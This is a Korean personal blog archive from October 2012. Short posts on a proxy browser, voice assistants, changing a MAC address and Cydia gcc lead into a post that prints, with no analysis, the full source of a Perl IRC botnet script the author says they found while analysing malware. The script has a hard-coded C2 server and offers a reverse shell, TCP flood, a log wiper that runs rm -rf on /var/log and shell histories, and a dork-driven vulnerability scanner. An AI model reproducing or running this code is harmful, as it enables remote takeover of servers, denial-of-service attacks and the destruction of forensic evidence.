oroi's spot: 10월 2012

프록시 브라우저

현재 구글의 지도를 나라별로 볼려고 하다보니 Proxy를 변경하면서 접속해야 할 경우가 많다 ㅠㅠ

그래서 tor를 쓰다가 그냥 이번에 한번 만들자 싶어서 Proxy를 변경하며 접속하기 편하게 하기 위한 브라우져를 만들어 보았다 ㅋ

proxy.txt 에 사용하고자 하는 proxy 리스트를 넣으면 사용할수 있다.

선택하는 순간 proxy 설정이 바뀌며 종료하면 proxy 설정이 초기화 된다.

proxy.exe

proxy.txt

소스코드는 아래에서 받을수 있음 ㅋ

http://code.google.com/p/oroi/source/browse/#svn%2Ftrunk%2FProxyBR

Apple의 Siri와 Android의 Voice Assistant

Apple의 Siri와 Android의 Voice Assistant를 보면 활용도에서 너무 차이가 나는거 같습니다.
기본적으로 "What time is it now?"를 물으면 둘다 쉽게 대답합니다. ㅎㅎ
하지만 "How is weather today?" 라고 물으면 안드로이드는 구글 검색으로 넘어가고(젤리빈기준) 애플은 현재 지역을 찾을수 없다고 나옵니다.(ios 5기준)
거기다 "Show me today schedule" 이라고 말하면 안드로이드는 또 구글 검색으로 넘어가고(젤리빈기준) 애플은 스케쥴이 없다고 확인해줍니다.(ios 5기준)
아직은 안드로이드의 발전이 더 필요한 상황이네요 ㅠㅠ 보이는 ui effect에만 신경 쓰지말고 내부에도 좀 신경 써줬으면 좋겠네요 ㅠㅠ

윈도우 맥 어드레스 바꾸기

자주가는 커뮤니티에 windows xp에서 되던 맥어드레스 변경이

win 8에서 안된다는 이야기가 있어서 이상하다 싶었다 ㅎㅎ

win7에서는 맥 변경이 잘되서 잘 쓰고 있기 때문이다 ㅎㅎ

그래서 혹시나 어플을 쓰고 장치관리자에서 직접 바꾸는걸 안쓰시는 분들을 위해

이 포스팅을 쓴다 ㅋ

1. 장치 관리자로 이동한다.

2. 네트워크 어댑터로 이동하여 원하는 장치를 선택한다.

(무선랜의 경우 wireless 어쩌고가 있꺼나 대부분 ralink나 atheros를 많이 씀)

3. 원하는 장치를 더블클릭하면 속성창이 뜨게 되는데 그 상태에서 고급 탭을 클릭.

4. 속성 값 중에서 "네트워크 주소" 또는 "Network Address" 라고 쓰여져잇는 탭을 클릭

5. 값이라고 되어있는 공란에 원하는 맥어드레스 값 입력하면 됨

(나중에 다시 원래의 주소로 되돌리고 싶을때는 없음 을 선택하면됨)

----------------------자신의 원래 맥 주소 확인하기-------------------------
제어판에서 네트워크 환경 설정인가를 보면 자신의 네트워크 장치를 볼수 있으며
더블클릭해서 나오는 상태창에 자세히를 클릭하면 확인가능함
(단. 네트워크 연결이 안된 X 자 표시 상태에서는 속성창으로 바로 넘어감.)

요즘 cydia에 gcc가 안보인다 싶더니 ㅋ

요즘 cydia에 gcc가 안보인다 싶더니 ㅋ
이젠 gcc가 libgcc를 설치못해서 안되는거였다 ㅋ
왜 libgcc가 빠져잇는지 모르겟지만 ㅋ

libgcc를 fake-libgcc로 대체해서 강제 설치를 하는게 있는데 ㅋ

그런거 별로 안 좋아해서 ㅋ new*** 한테 물어보니 ㅋ

요기에 있네 ㅋ
http://cydia.nexti4hack.com/

잘 안 쓰는 cydia 였던거 같은데 ㅋ
나이스 하다 ㅋㅋㅋ

예전에 악성코드 분석하다 찾은 perl 웹쉘(pret.jpg)

#!/usr/bin/perl
#
# What is New in V2.0 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan <ip>
#!bot @nmap <ip> <beginport> <endport>
#!bot @back <ip><port>
#!bot @udpflood <ip> <packet size> <time>
#!bot @tcpflood <ip> <port> <packet size> <time>
#!bot @httpflood <site> <time>
#!bot @linuxhelp
#!bot @hajar <vuln> <dork>
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail <subject> <sender> <recipient> <message>
#!bot @join <#channel>
#!bot @part <#channel>
#!bot @help
#!bot cd tmp for example
#!bot !eval <code= for example :@nickname>
#
#
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################

######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '/usr/sbin/httpd -k start Ps-X';
######################
#####################################################################
#/!\ .:CONFIGURATION:. /!\#
#####################################################################
############################################
my $linas_max='8';
#----------------- #
# Maximum Lines for Anti Flood #
#############################################
my $sleep='5';
#----------------- #
#Sleep Time #
############################################
my $cmd="http://localhost/cmd.txt??";
#----------------- #
#CMD that is printed in the channel #
############################################
my $id="http://localhost/id.txt";
#----------------- #
#ID = Response CMD #
############################################
my @adms=("S3T4NG");
#----------------- #
#Admins of the Bot set your nickname here #
############################################
my @canais=("#cyberbintauna");
#----------------- #
#Put your channel here #
############################################
my @nickname = ("S3T4NG|");
my $nick = $nickname[rand scalar @nickname];
#----------------- #
#Nickname of bot #
############################################
my $ircname ='PSX';
chop (my $realname = 'PSX');
#----------------- #
#IRC name and Realname #
############################################
$servidor='irc.ps-x.org' unless $servidor;
my $porta='6667';
#----------------- #
#IRCServer and port #
############################################
#####################################################################
#/!\ .:CONFIGURATION:. /!\#
#####################################################################
######################
#End of Configuration#
# #
######################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################

#Connect
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Masalah fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}

my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {

$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 PitBull\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}

#End of Connect

########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################

######################
# PREFIX #
# #
######################
# You can change the prefix if you want but the commands will be different
# The standard prefix is !bot if you change it into !bitch for example
# every command will be like !bitch @udpflood, !bitch @googlescan.
# So its recommended not to change this ;)
######################

if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
######################
# End of PREFIX #
# #
######################

elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {

######################
# Help #
# #
######################

if ($funcarg =~ /^help/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 Select the function you want help for");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ ddos");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ hajar");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ backconnect");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ shell");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ portscanner");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 Or if you want too know all the commands type:");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ commands");

}

if ($funcarg =~ /^ddos/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 There are 3 DDossers in this bot");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 UDPFlood, HTTPFlood and TCPFlood");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ udpflood <ip> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ tcpflood <ip> <port> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ httpflood <site> <time>");

}

if ($funcarg =~ /^rfiscan/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 This bot also contains a RFI Scanner.");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 That contains the engines : 12G 1o 8o 12g 9l 1e 1, 7M 1S 7N 1, 7A ll 7T he 7W eb 1, 14A 1S 14K 1, 7AOL, 1L 7yc 1o 7s 1, 13Y 6ahoo ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 Commands :");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ hajar <vuln> <dork>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You can find strings here : http://www.geocities.com/retro_nine_suck//bug.scan.txt ");

}

if ($funcarg =~ /^backconnect/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You use backconnect like this :");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ back <ip><port>");
}

if ($funcarg =~ /^shell/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 This bot has a integrated shell");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You can use it in private but also public in the channel");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 In public channel just use : 7!bot cd tmp 12 for example");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 For help with the linux commands type : !bot 7@ linuxhelp");
}

if ($funcarg =~ /^portscanner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 There is a normal portscan and a Nmap:");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ portscan <ip>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ nmap <ip> <beginport> <endport>");
}

if ($funcarg =~ /^commands/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You can use the following commands :");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ portscan <ip>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ nmap <ip> <beginport> <endport>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ back <ip><port>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot cd tmp 12 for example");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ udpflood <ip> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ tcpflood <ip> <port> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ httpflood <site> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ linuxhelp");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ hajar <vuln> <dork>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ system");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ logcleaner");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ sendmail <subject> <sender> <recipient> <message>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ milw0rm");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ join #channel");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ part #channel");
}

if ($funcarg =~ /^linuxhelp/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Dir where you are : pwd");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Start a Perl file : perl file.pl");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Go back from dir : cd ..");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Force to Remove a file/dir : rm -rf file/dir;ls -la");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Show all files/dir with permissions : ls -lia");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find config.inc.php files : find / -type f -name config.inc.php");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find all writable folders and files : find / -perm -2 -ls");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find all .htpasswd files : find / -type f -name .htpasswd");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find all service.pwd files : find / -type f -name service.pwd");
}

######################
# End of Help #
# #
######################

######################
# Commands #
# #
######################

if ($funcarg =~ /^system/) {
$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Info BOT : 7 Servidor :Hiden : 6667");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Uname -a : 7 $uname");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Uptime : 7 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Own Prosses : 7 $processo");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12ID : 7 $id");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Own Dir : 7 $ownd");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12OS : 7 $distro");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Owner : 7 S3T4NG");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Channel : 7 #BINTAUNA");
}

if ($funcarg =~ /^milw0rm/) {
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
if ($x =~ /\&lt\;/) {
$x =~ s/\&lt\;/</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 9milw0rm 12:. 1| 12 Latest exploits : ");
foreach $x (0..(@ltt - 1)) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 9milw0rm 12:. 1| 12 $bug[$x] - $ltt[$x]");
sleep 1;
}}
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# Portscan #
# #
######################

if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Port Scan 12:. 1| 12 Scanning for open ports on 1".$1." 12 started .");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Port Scan 12:. 1| 12 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Port Scan 12:. 1| 12 No open ports foundend. ");
}
}

######################
# End of Portscan #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# Nmap #
# #
######################
if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
my $hostip="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| 1: $1 12.: 1Ports 12:. 1 $2-$3");
foreach my $porta ($portstart..$portend){
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| 12Founded 1 $porta"."/Open");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| Complete ");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| No open ports have been founded 13");
}
}
######################
# End of Nmap #
# #
######################
#
# The PitBull !!!!
#
######################
# Log Cleaner #
# #
######################
if ($funcarg =~ /^logcleaner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 This process can be long, just wait");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 Done! All logs erased");
}
######################
# End of Log Cleaner #
# #
######################
#
# The PitBull !!!!
#
######################
# MAILER #
# #
######################
# For mailing use :
# !bot @sendmail <subject> <sender> <recipient> <message>
#
######################
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Mailer 12:. 1| 12 Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Mailer 12:. 1| 12 Mail Sended To : 2 $recipient");
}
######################
# End of MAILER #
# #
######################
######################
# Join And Part #
# #
######################
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}

######################
#End of Join And Part#
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# TCPFlood #
# #
######################

if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1TCP DDos 12:. 1| 12 Attacking 1 ".$1.":".$2." 12for 1 ".$3." 12seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl : 1| 12.: 1TCP DDos 12:. 1| 12Attack done 1 ".$1.":".$2.".");
}
######################
# End of TCPFlood #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# Back Connect #
# #
######################
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1BackConnect 12:. 1| 12 Connecting to 1 $host:$porta");
}
}
######################
#End of Back Connect#
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# MULTI SCANNER #
# #
######################
if ($funcarg =~ /^hajar\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my %hosts;
### Start Message
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 hajar 1$bug 12$dork");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 tungguin ya say ");
### End of Start Message
# Starting Google
my @glist=&google($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 12G 1o 8o 12g 9l 1e 1 ".scalar(@glist)." 12Sites");
#
my @mlist=&msn($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 7M 1S 7N 1 ".scalar(@mlist)." 12Sites");
#
my @allist=&alltheweb($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 7A ll 7T he 7W eb 1 ".scalar(@allist)." 12Sites");
#
my @asklist=&ask($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 14A 1S 14K 1 ".scalar(@asklist)." 12Sites");
#
my @aollist=&aol($dork);
